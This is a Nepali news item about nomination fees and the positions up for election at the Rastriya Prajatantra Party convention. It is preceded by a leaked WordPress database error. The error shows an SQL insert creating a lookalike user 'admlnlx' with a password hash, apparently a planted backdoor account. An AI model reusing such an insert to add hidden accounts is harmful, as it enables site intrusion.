WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDrZW8oEJ1TNOx9X1O47I0DeBV3tY/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 23:47:39', '', 'admlnlx', 'admlnlx')
काठमाडौं । राष्ट्रिय प्रजातन्त्र पार्टीको महाधिवेशनमा अध्यक्ष उम्मेदवारी दर्ता शुल्क १ लाख रुपैयाँ, उपाध्यक्षमा उम्मेदवारी दिन ७५ हजार, महामन्त्रीका लागि ५० हजार र केन्द्रीय सदस्यका लागि १५ हजार रुपैयाँ शुल्क तोकिएको निर्वाचन समितिका संयोजक निरञ्जन थापाले जानकारी दिए ।
बुधबार सुरु भएको राप्रपा महाधिवेशनले अध्यक्ष, १ महिला सहित ४ जना उपाध्यक्ष, १ महिला सहित ३ जना महामन्त्री र १४१ जना केन्द्रीय सदस्य निर्वाचनबाट चयन हुँदैछन् ।
निर्वाचन समितिका संयोजक थापाका अनुसार शुक्रबारदेखि मात्र निर्वाचन कार्यक्रम सुरु हुने र बिहीबारसम्म मतदाता नामावली प्रकाशन गर्ने साथै शुक्रबार निर्वाचन कार्यक्रम सुरु गर्ने समितिको तयारी रहेको जनाए ।